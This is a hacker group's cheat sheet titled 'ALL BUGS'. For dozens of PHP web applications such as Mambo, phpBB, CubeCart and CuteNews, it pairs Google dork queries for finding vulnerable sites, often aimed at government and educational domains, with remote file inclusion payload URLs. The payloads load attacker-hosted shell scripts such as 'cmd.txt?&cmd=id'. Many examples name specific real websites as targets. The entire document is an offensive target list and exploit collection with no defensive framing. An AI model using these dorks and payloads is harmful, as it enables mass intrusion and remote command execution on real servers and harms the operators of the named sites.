
ALL BUGS
@Mambo
Key word: ( "Powered by Mambo" inurl:*gov* ) or ( allinurl:*.br/index.php?option=com_content )
or ( allinurl:*gov*/component/option,com_contact/Itemid,*/ )
Bug : index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=CMD
@PHPFanBase
#Key Word: ( "Powered by: PHPFanBase" inurl:*br* ) or ( inurl:*.br/members.php?id=all )
or ( "Powered by: PHPCalendar" ) or ( "Powered by: PHPCurrently" ) or ( "Powered by: PHPClique" )
or ( "Powered by: PHPQuotes" )
#Bug : protection.php?action=logout&siteurl=CMD
@AllMyGuests
#Key Word: ( Nuke ET Copyright © 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests )
or ( "powered by AllMyGuests" inurl:*br* )
#Bug : modules/ALlMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD
#key word: ( "Site powered By Limbo CMS" )
#Bug : index2.php?includes_dir=CMD
@SiteFrame
#key word: ( "powered by siteframe" ) or ( allinurl:*gob*/folder.php?id=* )
#Bug : classes.php?LOCAL_PATH=CMD
@Pivot
#Key word: ( "powered by pivot" ) or ( allinurl:*br*/entry.php?id=*#* ) or ( allinurl:*de*/*.php?c=*w=*t=* )
or ( "powered by pivot" inurl:**/archive*.php ) or ( "powered by pivot" inurl:**/entry.php?id=* )
#Bug : extensions/moblog/moblog_lib.php?basedir=CMD
@PHPView
key word : /phpgedview/login.php
bug : help_text_vars.php?dir&PGV_BASE_DIRECTORY=
ex : http://[target]/[phpgetviewpath]/help_text_vars.php?dir&PGV_BASE_DIRECTORY=inject
@Cms
key word : /cms/front_content.php?idcat=
bug : contenido/classes/class.inuse.php?cfg[path][contenido]=
ex : http://[target]/[path]/contenido/classes/class.inuse.php?cfg[path][contenido]=inject
@PHPcoin
key word : /phpcoin/login.php
bug : config.php?_CCFG[_PKG_PATH_DBSE]=
ex : http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=inject CMD
@Popper
key word : /popper/index.php
bug : /popper/childwindow.inc.php?form=
ex : http://[target]/popper/childwindow.inc.php?form=http://[webinject]
@paBugs 2.0
keyword : "powered by paBugs 2.0 Beta 3"
bug : class.mysql.php?path_to_bt_dir=
ex :http://waoarea.com/forum/Bugs/class.mysql.php?path_to_bt_dir=http://[webinject]
@AllMyLinks
Keyword : "powered by AllMyLinks"
bug : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
ex:http://www.edu.ch/links/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http:[attacker]
@Cubecart 3.0.6
keyword : "powered by CubeCart 3.0.6"
bug : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
ex: http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://[attacker]
@Ashnews
KeyWord: allinurl:"powered by AshNews"
bug:ashnews.php?pathtoashnews=
example:
http:/http://roswell.hitnews.pl/ashnews.php?pathtoashnews=http://[attacker]
@HostAdmin
KeyWord: :"Powered by HostAdmin"
bug : /directory/index.php?path=[suntik.txt]
@phpBB 2.0.6
KeyWord : allinurl:Powered by phpBB 2.0.6
inject with: &highlight=%2527.include($_GET[a]),exit.%2527&a=
ex:http://student.ipb.ac.id/forum/viewtopic.php?p=3&highlight=%2527.include($_GET[a]),exit.%2527&a=http://[suntikan maut]
@Fantastic News
key word : "powered by Fantastic News v2.1.2"
bug : archive.php?CONFIG[script_path]=CMD
ex : http://[target]/[path]/archive.php?CONFIG[script_path]=http://[evilweb]
@ImpexData
bug:impex/ImpExData.php?systempath=
ex : http://www.windows-mobile.ch/vb/impex/ImpExData.php?systempath=http://[attack]/cmd.txt?&cmd
@Iuser
KeyWord: "Powered By Iuser"
Bug : /iuser/common.php?include_path=
http://www.humanenergyscience.com/iuser/common.php?include_path=http://[attack]/bom.txt?
@Knowledge Base
KeyWord : Knowledge Base at PHPBB
bug : /includes/kb_constants.php?module_root_path=
ex : http://www.vitrax.org/includes/kb_constants.php?module_root_path=http://injectbos/cmd.txt?
@MyEvent 1.2
KeyWord : "MyEvent 1.2 " or "/calendar/myevent.php"
Bug : /myevent.php?myevent_path=
ex: http://www.zoetermeer9.nl/site/calendar/myevent.php?myevent_path=injekan.cmd
@Advanced Guestbook
Keyword : inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Bug : /admin/addentry.php?phpbb_root_path=
ex:http://radiogodhavn.dk/forum/admin/addentry.php?phpbb_root_path=injekan
@Limbo CMS
Keyword : inurl:"index2.php?option=rss" or "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://[scriptshellmu]?
ex : http://www.hoshemin.com.ru/classes/adodbt/sql.php?classes_dir=injekan
@TopSite
Keyword : "Powered By Aardvark Topsites PHP 4.2.2"
inject: www.target.com/[path]/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=[evil code]
@Albinator
KeyWord : "Powered by Albinator"
bug : albinator/essential/gc.php?dirpath=http://geocities.com/wong_sedenk/injek.txt?
@TotalCalendar
KeyWord : "Powered by TotalCalendar"
Bug : www.target.com/[path]/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=injekan
@CuteNews
KeyWord : inurl:cutenews/shownews.php
Bug : /cutenews/shownews.php?cutepath=
ex : http://www.flip-script.com/cutenews/shownews.php?cutepath=injekan.com?
@Coppermine
Keyword : allinurl:/ modules / coppermine
Bug : http://[VICTIM]/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.inject.com
@MaMbo 4.5
KeyWord : inurl:includes/Cache/Lite/ or "powered by mambo 4.5"
Bug : http://[victim]/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http ://situsinject.com
ex: http://www.jasonruyle.com/en/includes/Cache/Lite/Function.php?mosConfig_absolute_path=injekan.com?
@CgiUpgrade
KeyWord : allinurl:/index.cgiupgrade_album.php
Bug : http://[VICTIM]/index.cgiupgrade_album.php?GALLERY_BASEDIR=http://www.webloe.com/phpinjection.txt?&cmd=id
@XoopsGallery
KeyWord : allinurl:/modules/xoopsgallery
Bug : http://[VICTIM]/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.webloe.com/phpinjection.txt?&cmd=id
@SkinZero
KeyWord : allinurl:/skin/zero_vote/error.php or allinurl:/zero_vote/error.php
Bug : /skin/zero_vote/error.php?dir=http://[ATTACKER]
@pnphBB2
KeyWord : allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
Bug : /modules/4nAlbum/public/displayCategory.php?basepath= web injek
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=web injek
@FarsiNews
KeyWord : "powered by farsiNews"
Bug : http://[target]/loginout.php?cmd=dir&cutepath=injekan
@MaMbo 4.5.1
KeyWord : allinur:index2.php?option=
inurl:mambo/index.php
inurl:cms/index.php
powered by mambo 4.5.1
Bug : www.target.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=inject
@Agenda
KeyWord : intitle:phpmyagenda
Bug : agenda.php3?rootagenda=http://injek.org/injek.txt?
@Fclick
KeyWord : inurl:"fclick.php?fid"
Bugs : /show.php?path=Inject
@Squirrelcart
KeyWord : inurl:/squirrelcart/
bug : /cart_content.php?cart_isp_root=http://bdubphotos.net/gallery/data/info/info.txt?
@ezUserManager
KeyWord : "powered by ezUserManager"
Bug : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[evilscript]
@DeluxeBB
KeyWord : "Powered by: DeluxeBB "
Bug: http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=injek
@TrNewsPortal
KeyWord : "TR Newsportal" or allinurl: thread.php?group
Bug : http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=injek
@EQdkp
KeyWord: "powered by EQdkp"
bug : /includes/dbal.php?eqdkp_root_path=
ex : http://[target]/[path]/includes/dbal.php?eqdkp_root_path=injek
@UBBthread
KeyWord: allinurl:"/ubbthreads/"
Bug: /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
@DragonPath
Keyword: "powered by Php Blue Dragon Platinum"
http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts
@ScozNews
KeyWord: "(Powered By ScozNews)"
http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
@Informium
KeyWord: "Informium 0.12.0"
bugs: http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
@Igloo
Keyword: "Igloo 0.1.9" allinurl: igloo
bugs: http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
@Phpondirectory
KeyWord: phpOnDirectory (CONST_INCLUDE_ROOT) <= v.1.0 Remote File Include Vulnerability
http://www.site.com/[phpOnDirectory_path]/admin/generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/index.php?CONST_INCLUDE_ROOT=[evil_scripts]
@aePartner
KeyWord: aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability
Bugs: http://www.site.com/[aePartner_path]/inc/design.inc.php?dir[data]=[evil_scripts]
@DreamAccount
Keyword: "powered by DreamAccount"
Bugs:
/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?
@Wikiwig
KeyWord: Wikiwig <= V4.1 Remote File Include Vulnerability
Bugs: http://www.site.com/[wikiwig-V4.1]/_wk/wk_lang.php?WK[wkPath]=[evil_scripts]
@DittoNews
KeyWord: "News Managed by Ditto News"
Bugs: http://www.site.com/[XtremeNews_path]/sources/post.php?fil_config=[evil_scripts]
______________________________________________________________________________________________________
#GaulDong | #crusader
By : MG-Manado or bogani|totabuan